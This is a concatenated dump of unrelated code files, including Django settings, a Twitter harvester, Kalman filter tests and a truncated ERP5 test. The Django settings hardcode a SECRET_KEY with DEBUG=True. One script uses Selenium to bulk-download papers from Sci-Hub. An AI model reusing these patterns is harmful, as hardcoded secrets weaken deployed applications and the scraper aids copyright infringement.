\"Height\", windowHeight)\n\npositionRight = int(root.winfo_screenwidth() / 2 - windowWidth / 2)\npositionDown = int(root.winfo_screenheight() / 2 - windowHeight / 2)\n\nroot.geometry(\"+{}+{}\".format(positionRight, positionDown))\n\n\n\nbtn1 = Button(root, text=\"Import Image\", command=onOpen)\nbtn1.pack(padx=10, pady=5, fill=X, side=BOTTOM)\n\nroot.mainloop()","sub_path":"BlackWhiteMain.py","file_name":"BlackWhiteMain.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"572768409","text":"\"\"\"\nDjango settings for itracker project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\nfrom unipath import Path\n\nPROJECT_DIR = Path(__file__).ancestor(2)\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'y9g+ljh!j85lbhzaxc$#l!uig=r%&8-+nf(!d+4l#ekiala$3&'\n\nDEBUG = True\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n # Third-party apps\n 'django_extensions',\n 'widget_tweaks',\n 'mathfilters',\n 'tinymce',\n\n # ITracker apps\n 'apps.users',\n 'apps.projects',\n 'apps.trackers',\n 'apps.issues',\n 'apps.enumerations',\n 'apps.news',\n 'apps.time_entries',\n 'apps.journals',\n)\n\nAUTH_USER_MODEL = 'users.User'\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'core.middleware.RequiredLoginMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nWSGI_APPLICATION = 'wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': PROJECT_DIR.child('db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATIC_ROOT = PROJECT_DIR.child('static')\n\nSTATICFILES_DIRS = (\n PROJECT_DIR.child(\"assets\"),\n)\n\nTEMPLATE_DIRS = (\n PROJECT_DIR.child(\"templates\"),\n)\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = PROJECT_DIR.child('media')\n\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = '/'\n\nTINYMCE_DEFAULT_CONFIG = {\n 'theme': \"advanced\",\n 'cleanup_on_startup': True,\n 'custom_undo_redo_levels': 10,\n}\nTINYMCE_COMPRESSOR = True\n","sub_path":"itracker/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"583779382","text":"import math\r\n\r\ndef isPrime(n):\r\n 
#checks if n is prime\r\n    flag = True\r\n    if n<2: #1 is a unit, not a prime\r\n        flag = False\r\n    elif n<4: #2,3 are primes and not 1 mod 6\r\n        flag = True\r\n    else: #for numbers 4 or more\r\n        if n % 2 == 0 or n % 3 ==0: #this eliminates everything not a neighbor of 6\r\n            flag = False\r\n        else: #only neighbors of 6 left\r\n            for i in range(2,int(math.floor(math.sqrt(n)))+1):\r\n                if n % i ==0:\r\n                    flag = False\r\n                    break\r\n    return flag\r\n\r\ndef listPrimes(n): #lists the first n primes\r\n    primes = []\r\n    counter = 0\r\n    while len(primes) < n:\r\n        if isPrime(counter):\r\n            primes.append(counter)\r\n        counter +=1\r\n    return primes\r\n\r\n#print(isPrime(67))\r\n#print(listPrimes(10001))\r\nprint(listPrimes(10001)[-1])\r\n","sub_path":"007.py","file_name":"007.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"25156576","text":"import os\nimport argparse\nimport itertools as it\nimport collections\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom utils import configs\nfrom preprocessing import preprocess\nfrom Student import Student\nfrom LabGroup import LabGroup\nimport utils.drivers as driver\n\n\ndef _check_is_good_combo(student_combo: list, all_students: list, config) -> bool:\n    r\"\"\"Checks if a given combination is valid.\n\n    Criteria to check:\n    (1) All students are accounted for\n    (2) No student appears more than once\n    (3) All lab groups have 3 <= num_members <= 5\n    \"\"\"\n\n    is_good = False\n\n    # all students are accounted for and no student is present more than once\n    if set([stud for studs in student_combo for stud in studs]) == set(all_students):\n        occurrences = collections.Counter([stud for studs in student_combo for stud in studs])\n\n        # all students occur only one time\n        # if student is in more than one lab group for some tup, toss it out\n        # there will eventually be a tuple with student in only one lab group\n        if max(occurrences.values()) == 1:\n            is_good = True\n        # for lg_students in student_combo:\n        #     if len(lg_students) in config.group_sizes:\n        #         is_good.append(True)\n        #     else:\n        #         is_good.append(False)\n\n    # result = (np.array(is_good)).all()\n    # print(result)\n\n    return (np.array(is_good)).all()\n\n\ndef _write_good_combos(good_combos: list, file_name, lab_groups, write_score: bool=False, score: int=0):\n    r\"\"\"Writes the given time/student configurations to a specified .txt file.\"\"\"\n\n    with open(file_name, \"w\") as f:\n        if write_score:\n            f.write(f\"Unhappiness level: {score}\\n\")\n        for i, (times, combos) in enumerate(good_combos):\n            title = f\"Configuration {i}\"\n            f.write(f\"{title}\\n\" + (\"=\"*len(title)) + \"\\n\")\n\n            for j, (time, combo) in enumerate(zip(times, combos)):\n                f.write(f\"{lab_groups[i].name} ({time}): \")\n\n                for stud in combo:\n                    f.write(f\" {stud.name}\")\n                f.write(\"\\n\")\n            f.write(\"\\n\"*4)\n\n\ndef _score_configuration(combination, lab_groups):\n    r\"\"\"Calculates the total unhappiness for a given configuration of lab groups.\n\n    Calculated as the sum of the indexes into each student's preference list of\n    their actual assignment.\n    \"\"\"\n\n    # calculate the index offset for each student\n    total_unhappiness = 0\n\n    for i, lg_students in enumerate(combination):\n        for stud in lg_students:\n            total_unhappiness += stud.preferences.index(lab_groups[i].name)\n\n    return total_unhappiness\n\n\ndef find_assignments(students, lab_groups, config):\n\n    # match students with lab group times for each lab group\n    for lg in lab_groups:\n        lg.find_members(students)\n\n    
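# pair one candidate meeting time per lab group (Cartesian product below),\n    # then try to partition the students among the groups for that combination\n    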
good_combos = []\n cart_prod_lg_times = [list(lg.good_times.keys()) for lg in lab_groups]\n # for elem in cart_prod_lg_times: print(f\"number of times: {len(elem)} ---> {elem}\\n\")\n # for elem in cart_prod_lg_times: print(f\"\\n{elem}\\n\")\n \n # I'm not sure if this product will work as coded (since input is list of lists)\n all_time_combos_pbar = tqdm(list(it.product(*cart_prod_lg_times)), desc=\"Going through time combinations\")\n for time_combo in all_time_combos_pbar:\n lg_students = [lg.good_times[time_combo[i]] for i, lg in enumerate(lab_groups)] # list of sets of students\n students_in_time_combo = [stud for studs in lg_students for stud in studs]\n\n # for i, elem in enumerate(students_in_time_combo): print(i, elem)\n # print()\n # for i, elem in enumerate(set(students_in_time_combo)): print(i, elem)\n\n # all students accounted for\n if set(students_in_time_combo) == set(students):\n for group_size_combo in it.combinations_with_replacement(config.group_sizes, r=len(lab_groups)):\n # print(f\"{group_size_combo} =?= {len(students)}\")\n # checksum\n if sum(group_size_combo) == len(students):\n all_student_combos = [it.combinations(lg_studs, r=group_size_combo[i]) for i, lg_studs in enumerate(lg_students)] # list of lists of lists\n\n # filter_student_combos = [student_combo for student_combo in all_student_combos if set([stud for studs in student_combo for stud in studs]) == set(students)]\n # print(f\"Total permutations: {len(list(all_student_combos[0]))} x {len(list(all_student_combos[1]))} x {len(list(all_student_combos[2]))} x {len(list(all_student_combos[3]))} x {len(list(all_student_combos[4]))}\")\n\n # check if every combination is compatible\n # all_student_combos_for_time_pbar = tqdm(list(it.product(*all_student_combos)), desc=\"Going through student configurations\", leave=False)\n for particular_student_combo in it.product(*all_student_combos):\n # print(\"\\n\"*5)\n # for combo in particular_student_combo:\n # for stud in combo:\n # print(stud.name, end=\" \")\n # print()\n if _check_is_good_combo(particular_student_combo, students, config):\n good_combos.append((time_combo, particular_student_combo))\n # all_student_combos_for_time_pbar.update()\n all_time_combos_pbar.update()\n\n # record all found combinations and compute scores\n _write_good_combos(good_combos, config.preprocess_config.data_dir/\"all_configurations.txt\", lab_groups)\n scores = [_score_configuration(lg_configurations, lab_groups) for (_, lg_configurations) in good_combos]\n\n # get best matching(s) and record results\n min_score = min(scores)\n best_scores_idx = [i for i, score in enumerate(scores) if score == min_score]\n best_combos = [good_combos[i] for i in best_scores_idx]\n _write_good_combos(best_combos, config.preprocess_config.data_dir/\"best_configurations.txt\", lab_groups, write_score=True, score=min_score)\n\n\nif __name__ == \"__main__\":\n cfg = configs.AssignmentsConfig()\n\n student_data, lab_group_data = preprocess(cfg.preprocess_config)\n\n find_assignments(student_data, lab_group_data, cfg)\n","sub_path":"src/assignments.py","file_name":"assignments.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"368692203","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n # 
replace 'myfile.root' with the source file you want to use\n    fileNames = cms.untracked.vstring(\n        #'file:/eos/uscms/store/user/qliphy/div/44CD52D2-C0FC-E111-81E6-00215E21DF18.root',\n\t\t'/store/user/qliphy/RSWW_1000_02_SIM/RSWW_1000_02_AODSIM/c8f8ed334db8a7d6f56c62266b1dfa5b/RSWW_AODSIM_189_1_ry0.root'\n    )\n)\n\nprocess.demo = cms.EDAnalyzer('DiVMC')\n\n\n#process.TFileService.fileName = cms.string('new.root')\n\nOUTPUT_FILE_NAME = \"private_test.root\"\nprocess.TFileService = cms.Service(\n    \"TFileService\", fileName = cms.string( OUTPUT_FILE_NAME ),\n    closeFileFast = cms.untracked.bool(True)\n)\n\nprocess.options = cms.untracked.PSet(\nSkipEvent = cms.untracked.vstring('ProductNotFound')\n)\n\nprocess.p = cms.Path(process.demo)\n","sub_path":"GeneratorStudies/Central_Private_Comparison_pku/divmc_cfg.py","file_name":"divmc_cfg.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"555636351","text":"\n\nfrom xai.brain.wordbase.nouns._deathbed import _DEATHBED\n\n#class header\nclass _DEATHBEDS(_DEATHBED, ):\n\tdef __init__(self,): \n\t\t_DEATHBED.__init__(self)\n\t\tself.name = \"DEATHBEDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"deathbed\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_deathbeds.py","file_name":"_deathbeds.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225132869","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nimport logging\nfrom twarc import Twarc\nfrom sfmutils.harvester import BaseHarvester\n\n\nlog = logging.getLogger(__name__)\n\nQUEUE = \"twitter_rest_harvester\"\nROUTING_KEY = \"harvest.start.twitter.twitter_search\"\n\n\nclass TwitterHarvester(BaseHarvester):\n    def __init__(self, process_interval_secs=1200, mq_config=None, debug=False):\n        BaseHarvester.__init__(self, mq_config=mq_config, process_interval_secs=process_interval_secs, debug=debug)\n        self.twarc = None\n\n    def harvest_seeds(self):\n        # Create a twarc\n        self._create_twarc()\n\n        # Dispatch message based on type.\n        harvest_type = self.message.get(\"type\")\n        log.debug(\"Harvest type is %s\", harvest_type)\n        if harvest_type == \"twitter_search\":\n            self.search()\n        elif harvest_type == \"twitter_filter\":\n            self.filter()\n        else:\n            raise KeyError\n\n    def _create_twarc(self):\n        self.twarc = Twarc(self.message[\"credentials\"][\"consumer_key\"],\n                           self.message[\"credentials\"][\"consumer_secret\"],\n                           self.message[\"credentials\"][\"access_token\"],\n                           self.message[\"credentials\"][\"access_token_secret\"])\n\n    def search(self):\n        incremental = self.message.get(\"options\", {}).get(\"incremental\", False)\n\n        for seed in self.message.get(\"seeds\", []):\n            query = seed.get(\"token\")\n            # Get since_id from state_store\n            since_id = self.state_store.get_state(__name__, \"{}.since_id\".format(query)) if incremental else None\n\n            max_tweet_id = self._process_tweets(self.twarc.search(query, since_id=since_id))\n            log.debug(\"Searching on %s since %s returned %s tweets.\", query,\n                      since_id, self.harvest_result.summary.get(\"tweet\"))\n\n            # Update state store\n            if incremental and max_tweet_id:\n                self.state_store.set_state(__name__, \"{}.since_id\".format(query), max_tweet_id)\n\n    def filter(self):\n        assert len(self.message.get(\"seeds\", [])) == 1\n\n        track = self.message[\"seeds\"][0][\"token\"]\n\n        self._process_tweets(self.twarc.stream(track))\n\n    def _process_tweets(self, 
tweets):\n max_tweet_id = None\n for count, tweet in enumerate(tweets):\n if not count % 100:\n log.debug(\"Processed %s tweets\", count)\n if self.stop_event.is_set():\n log.debug(\"Stopping since stop event set.\")\n break\n if \"text\" in tweet:\n with self.harvest_result_lock:\n max_tweet_id = max(max_tweet_id, tweet.get(\"id\"))\n self.harvest_result.increment_summary(\"tweet\")\n if \"urls\" in tweet[\"entities\"]:\n for url in tweet[\"entities\"][\"urls\"]:\n self.harvest_result.urls.append(url[\"expanded_url\"])\n if \"media\" in tweet[\"entities\"]:\n for media in tweet[\"entities\"][\"media\"]:\n self.harvest_result.urls.append(media[\"media_url\"])\n return max_tweet_id\n\n\nif __name__ == \"__main__\":\n TwitterHarvester.main(TwitterHarvester, QUEUE, [ROUTING_KEY])\n","sub_path":"twitter_harvester.py","file_name":"twitter_harvester.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"48505261","text":"import pandas as pd\nimport time\nfrom selenium import webdriver\nimport os\nimport json\n\ndef main():\n papers = pd.read_excel('data/RPPdata.xlsx')\n dois = list(papers['DOI'].dropna())\n print(\"Starting Browser...\")\n driver = webdriver.Chrome(executable_path='C:\\\\Users\\\\Saatvik\\\\Documents\\\\ChromeDriver\\\\chromedriver.exe')\n Initial_path = 'C:\\\\Users\\\\Saatvik\\\\Downloads'\n doi_to_file_name = []\n for doi in dois:\n try:\n driver.get('https://sci-hub.tw/' + str(doi))\n driver.find_element_by_xpath('//*[@id=\"buttons\"]/ul/li/a').click()\n time.sleep(30)\n filename = max([Initial_path + \"\\\\\" + f for f in os.listdir(Initial_path)], key=os.path.getctime)\n doi_to_file_name.append({\n 'doi': doi,\n 'file': filename.split('\\\\')[-1]\n })\n except:\n print(doi, 'is giving error')\n continue\n with open('data/doi_to_file_name_data.json', 'w') as outfile:\n json.dump(doi_to_file_name, outfile)\n\n driver.close()\n\ndef put_names():\n df = pd.read_excel('data/RPPdata.xlsx')\n with open('data/doi_to_file_name_data.json') as outfile:\n data = json.load(outfile)\n new_data = []\n for i in data:\n new_data.append({\n 'doi': i['doi'],\n 'file': i['file'],\n 'title': df.loc[df['DOI'] == i['doi'], 'Study.Title.O'].values[0]\n })\n\n with open('data/doi_to_file_name_data.json', 'w') as outfile:\n json.dump(new_data, outfile)\n\n\nif __name__ == '__main__':\n put_names()\n","sub_path":"downloadPDFs.py","file_name":"downloadPDFs.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"18457319","text":"\"\"\"Tests for the linear Kalman predict step.\"\"\"\nimport json\n\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_array_almost_equal as aaae\n\nimport skillmodels.fast_routines.kalman_filters as kf\n\n# ======================================================================================\n# manual tests\n# ======================================================================================\n\n\ndef make_unique(qr_result_arr):\n long_side, m, n = qr_result_arr.shape\n for u in range(long_side):\n for j in range(n):\n if qr_result_arr[u, j, j] < 0:\n for k in range(n):\n qr_result_arr[u, j, k] *= -1\n\n\n@pytest.fixture\ndef setup_linear_predict():\n out = {}\n\n out[\"state\"] = np.array([[7, 9, 3], [8, 3, 5]])\n\n out[\"cov\"] = np.array(\n [\n [[0.3, 0, 0], [0, 0.5, 0], [0, 0, 0.9]],\n [[0.3, -0.2, -0.1], [-0.2, 0.3, -0.1], [-0.1, -0.1, 0.5]],\n ]\n )\n\n 
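# the \"root_cov\" arrays below hold the triangular factors that the square-root\n    # filter tests pass to kf.sqrt_linear_predict in place of the full covariances\n    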
out[\"root_cov\"] = np.array(\n [\n [[0.3, 0, 0], [0, 0.5, 0], [0, 0, 0.9]],\n [[0.3, 0.2, 0.1], [0, 0.3, 0.1], [0, 0, 0.5]],\n ]\n )\n\n out[\"shock_sd\"] = np.array([1.2, 0.3, 0.2])\n\n out[\"transition_matrix\"] = np.array([[0.2, 1, 2], [0.5, 0.9, 0.7], [0.2, 0.4, 0.4]])\n\n return out\n\n\n@pytest.fixture\ndef expected_linear_predict():\n out = {}\n\n out[\"predicted_states\"] = np.array([[16.4, 13.7, 6.2], [14.6, 10.2, 4.8]])\n\n out[\"predicted_covs\"] = np.array(\n [\n [[5.552, 1.74, 0.932], [1.74, 1.011, 0.462], [0.932, 0.462, 0.276]],\n [[3.192, 0.5, 0.308], [0.5, 0.277, 0.104], [0.308, 0.104, 0.1]],\n ]\n )\n\n out[\"predicted_sqrt_covs\"] = np.array(\n [\n [\n [5.427423, -0.424064, 0.0809716],\n [-0.424064, 0.374016, -0.0487112],\n [0.0809716, -0.0487112, 0.0572607],\n ],\n [\n [3.11777, 0.273778, 0.0502302],\n [0.273778, 0.354309, 0.0453752],\n [0.0502302, 0.0453752, 0.05562],\n ],\n ]\n )\n\n return out\n\n\ndef test_sqrt_predict_states(setup_linear_predict, expected_linear_predict):\n d = setup_linear_predict\n calc_pred_state, calc_pred_cov = kf.sqrt_linear_predict(\n d[\"state\"], d[\"root_cov\"], d[\"shock_sd\"], d[\"transition_matrix\"]\n )\n aaae(calc_pred_state, expected_linear_predict[\"predicted_states\"])\n\n\ndef test_sqrt_predict_root_covs(setup_linear_predict, expected_linear_predict):\n d = setup_linear_predict\n calc_pred_state, calc_pred_root_cov = kf.sqrt_linear_predict(\n d[\"state\"], d[\"root_cov\"], d[\"shock_sd\"], d[\"transition_matrix\"]\n )\n calc_cov = np.matmul(\n calc_pred_root_cov, np.transpose(calc_pred_root_cov, axes=(0, 2, 1))\n )\n aaae(calc_cov, expected_linear_predict[\"predicted_sqrt_covs\"])\n\n\n@pytest.fixture\ndef setup_unscented_predict():\n out = {}\n\n nmixtures, nind, nsigma, nfac = 2, 3, 7, 3\n\n out[\"stage\"] = 1\n\n first = np.array([1.1, 1.2, 1.3])\n second = np.array([1.4, 1.5, 1.6])\n third = np.array([2.1, 2.2, 2.3])\n fourth = np.array([2.4, 2.5, 2.6])\n\n # these are sigma_points for the test with focus on columns\n sps1 = np.zeros((nmixtures, nind, nsigma, nfac))\n sps1[0, 0, :, :] = np.tile(first, nsigma).reshape(nsigma, nfac)\n sps1[0, 1, :, :] = np.tile(second, nsigma).reshape(nsigma, nfac)\n sps1[1, 0, :, :] = np.tile(third, nsigma).reshape(nsigma, nfac)\n sps1[1, 1, :, :] = np.tile(fourth, nsigma).reshape(nsigma, nfac)\n out[\"sps1\"] = sps1.reshape(nmixtures * nind, nsigma, nfac)\n out[\"flat_sps1\"] = sps1.reshape(nmixtures * nind * nsigma, nfac)\n\n expected_states1 = np.zeros((nmixtures, nind, nfac))\n expected_states1[0, 0, :] = first\n expected_states1[0, 1, :] = second\n expected_states1[1, 0, :] = third\n expected_states1[1, 1, :] = fourth\n out[\"expected_states1\"] = expected_states1.reshape(nmixtures * nind, nfac)\n\n # these are sigma_points for the test with focus on weighting\n sps2 = np.zeros((nmixtures, nind, nsigma, nfac))\n sps2[:, :, :, :] = np.arange(nsigma).repeat(nfac).reshape(nsigma, nfac)\n out[\"sps2\"] = sps2.reshape(nmixtures * nind, nsigma, nfac)\n out[\"flat_sps2\"] = sps2.reshape(nmixtures * nind * nsigma, nfac)\n out[\"expected_states2\"] = np.ones((nmixtures * nind, nfac)) * 3\n\n # these are sigma_points for the test with focus on the covariances\n sps3 = np.zeros((nmixtures, nind, nsigma, nfac))\n sps3[:, :, 1, :] += 1\n sps3[:, :, 2, :] += 2\n sps3[:, :, 3, :] += 3\n sps3[:, :, 4, :] -= 1\n sps3[:, :, 5, :] -= 2\n sps3[:, :, 6, :] -= 3\n out[\"sps3\"] = sps3.reshape(nmixtures * nind, nsigma, nfac)\n out[\"flat_sps3\"] = sps3.reshape(nmixtures * nind * nsigma, nfac)\n\n sws_m = 
np.ones(nsigma) / nsigma\n out[\"sws_m\"] = sws_m\n out[\"sws_c\"] = sws_m\n\n qq = np.eye(nfac)\n q = np.zeros((2, nfac, nfac))\n q[:] = qq\n out[\"q\"] = q\n\n out[\"transform_sps_args\"] = {}\n\n exp_covs = np.zeros((nmixtures * nind, nfac, nfac))\n exp_covs[:] = np.array([[4.75, 4.5, 4.5], [4.5, 4.75, 4.5], [4.5, 4.5, 4.75]])\n out[\"exp_covs\"] = exp_covs\n\n exp_cholcovs = np.zeros_like(exp_covs)\n exp_cholcovs[:] = np.array(\n [\n [2.23606798, 0.00000000, 0.00000000],\n [1.78885438, 1.34164079, 0.00000000],\n [1.78885438, 0.596284794, 1.20185043],\n ]\n ).T\n out[\"exp_cholcovs\"] = exp_cholcovs\n\n out[\"out_states\"] = np.zeros((nmixtures * nind, nfac))\n out_sqrt_covs = np.zeros((nmixtures * nind, nfac + 1, nfac + 1))\n out[\"out_sqrt_covs\"] = out_sqrt_covs\n out[\"out_covs\"] = out_sqrt_covs[:, 1:, 1:]\n\n return out\n\n\ndef test_sqrt_unscented_predict_focus_on_colums(setup_unscented_predict, mocker):\n d = setup_unscented_predict\n mock_transform = mocker.patch(\n \"skillmodels.fast_routines.kalman_filters.transform_sigma_points\"\n )\n mock_transform.return_value = d[\"sps1\"]\n kf.sqrt_unscented_predict(\n d[\"stage\"],\n d[\"sps1\"],\n d[\"flat_sps1\"],\n d[\"sws_m\"],\n d[\"sws_c\"],\n d[\"q\"],\n d[\"transform_sps_args\"],\n d[\"out_states\"],\n d[\"out_sqrt_covs\"],\n )\n\n aaae(d[\"out_states\"], d[\"expected_states1\"])\n\n\ndef test_sqrt_unscented_predict_focus_on_weighting(setup_unscented_predict, mocker):\n d = setup_unscented_predict\n mock_transform = mocker.patch(\n \"skillmodels.fast_routines.kalman_filters.transform_sigma_points\"\n )\n mock_transform.return_value = d[\"sps2\"]\n\n kf.sqrt_unscented_predict(\n d[\"stage\"],\n d[\"sps2\"],\n d[\"flat_sps2\"],\n d[\"sws_m\"],\n d[\"sws_c\"],\n d[\"q\"],\n d[\"transform_sps_args\"],\n d[\"out_states\"],\n d[\"out_sqrt_covs\"],\n )\n\n aaae(d[\"out_states\"], d[\"expected_states2\"])\n\n\ndef test_sqrt_unscented_predict_focus_on_covs(setup_unscented_predict, mocker):\n d = setup_unscented_predict\n mock_transform = mocker.patch(\n \"skillmodels.fast_routines.kalman_filters.transform_sigma_points\"\n )\n mock_transform.return_value = d[\"sps3\"]\n kf.sqrt_unscented_predict(\n d[\"stage\"],\n d[\"sps3\"],\n d[\"flat_sps3\"],\n d[\"sws_m\"],\n d[\"sws_c\"],\n d[\"q\"],\n d[\"transform_sps_args\"],\n d[\"out_states\"],\n d[\"out_sqrt_covs\"],\n )\n make_unique(d[\"out_covs\"])\n aaae(d[\"out_covs\"], d[\"exp_cholcovs\"])\n\n\nshock_sd = np.array(\n [\n [[1.2, 0.3, 0.2]],\n [[0.1, 0.9, 0.2]],\n [[0.3, 0.01, 0.3]],\n [[0.2, 0.5, 0.6]],\n [[0.7, 0.1, 0.4]],\n [[0.2, 0.1, 0.1]],\n ]\n)\n\n# ======================================================================================\n# tests from filterpy\n# ======================================================================================\n\n\ndef unpack_predict_fixture(fixture):\n nfac = len(fixture[\"state\"])\n\n args = (\n np.array(fixture[\"state\"]).reshape(1, nfac),\n np.array(fixture[\"state_cov\"]).reshape(1, nfac, nfac),\n np.array(fixture[\"shock_sd\"]),\n np.array(fixture[\"transition_matrix\"]),\n )\n exp_state = np.array(fixture[\"expected_post_means\"])\n exp_cov = np.array(fixture[\"expected_post_state_cov\"])\n return args, exp_state, exp_cov\n\n\ndef convert_normal_to_sqrt_args(args):\n args_list = list(args)\n covs = args[1]\n all_diagonal = True\n for i in range(len(covs)):\n if (np.diag(np.diagonal(covs[i])) != covs[i]).any():\n all_diagonal = False\n\n if all_diagonal is True:\n args_list[1] = np.sqrt(covs)\n else:\n args_list[1] = 
np.transpose(np.linalg.cholesky(covs), axes=(0, 2, 1))\n    return tuple(args_list)\n\n\n# for the normal linear predict\n# ------------------------------\n\nfix_path = \"skillmodels/tests/fast_routines/generated_fixtures_predict.json\"\nwith open(fix_path, \"r\") as f:\n    id_to_fix = json.load(f)\nids, fixtures = zip(*id_to_fix.items())\n\n\n@pytest.mark.parametrize(\"fixture\", fixtures, ids=ids)\ndef test_sqrt_linear_predicted_state_against_filterpy(fixture):\n    args, exp_state, exp_cov = unpack_predict_fixture(fixture)\n    args = convert_normal_to_sqrt_args(args)\n    after_state, after_covs = kf.sqrt_linear_predict(*args)\n    aaae(after_state.flatten(), exp_state)\n\n\nnp.set_printoptions(formatter={\"float\": \"{: 0.3f}\".format})\n\n\n@pytest.mark.parametrize(\"fixture\", fixtures, ids=ids)\ndef test_sqrt_linear_predicted_cov_against_filterpy(fixture):\n    # this gives the covariance matrix, not a square root of it!\n    args, exp_state, exp_cov = unpack_predict_fixture(fixture)\n    args = convert_normal_to_sqrt_args(args)\n    after_state, after_cov_sqrt = kf.sqrt_linear_predict(*args)\n    after_cov_sqrt = after_cov_sqrt[0]\n\n    implied_cov = after_cov_sqrt.T.dot(after_cov_sqrt)\n\n    aaae(implied_cov, exp_cov)\n","sub_path":"skillmodels/tests/fast_routines/kalman_predict_test.py","file_name":"kalman_predict_test.py","file_ext":"py","file_size_in_byte":9777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"108433026","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nDemonstrates basic function usage\n\"\"\"\nval = '张三'\nprint('%s个思恋,年终奖%s元' % ('牛牛', '10万'))\n\n\n# Define a function\ndef calAge(age):\n    if age >= 18:\n        print(\"成年人\")\n    else:\n        print(\"未成年人\")\n\n\n# Call the function\ncalAge(20)\n\n# Demonstrate list slicing\nL = [\"马波\", \"牛波\", \"羊波\", \"皮波\", \"水波\"]\nresult = L[1:5]\nprint(result)\n","sub_path":"src/base/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"124545869","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2010 Nexedi SA and Contributors. All Rights Reserved.\n#\n# WARNING: This program as such is intended to be used by professional\n# programmers who take the whole responsibility of assessing all potential\n# consequences resulting from its eventual inadequacies and bugs\n# End users who are looking for a ready-to-use solution with commercial\n# guarantees and support are strongly advised to contract a Free Software\n# Service Company\n#\n# This program is Free Software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n##############################################################################\n\nimport unittest\nfrom DateTime import DateTime\nfrom VifibSecurityMixin import testVifibSecurityMixin\nfrom Products.ERP5Type.tests.Sequence import SequenceList\nfrom Products.ERP5Type.tests.backportUnittest import skip\n\nclass TestVifibFiberSubscription(testVifibSecurityMixin):\n \"\"\"Class for test global registration processus\"\"\"\n\n def createVifibDocumentList(self):\n \"\"\"Create vifib document\"\"\"\n \n #Add a valid vifib support\n self.logMessage(\"Create Support\")\n module = self.portal.getDefaultModule(\"Organisation\")\n organisation = module.newContent(portal_type=\"Organisation\",\n reference=\"vifib-support\")\n self.markManualCreation(organisation)\n organisation.validate()\n\n #Install website\n self.logMessage(\"Install Websites\")\n self.portal.portal_skins.vifib_web.WebSite_install()\n\n #Add Proxy Role\n workflow = self.portal.portal_workflow.document_conversion_interaction_workflow\n sc_wf = getattr(workflow,\"scripts\")\n 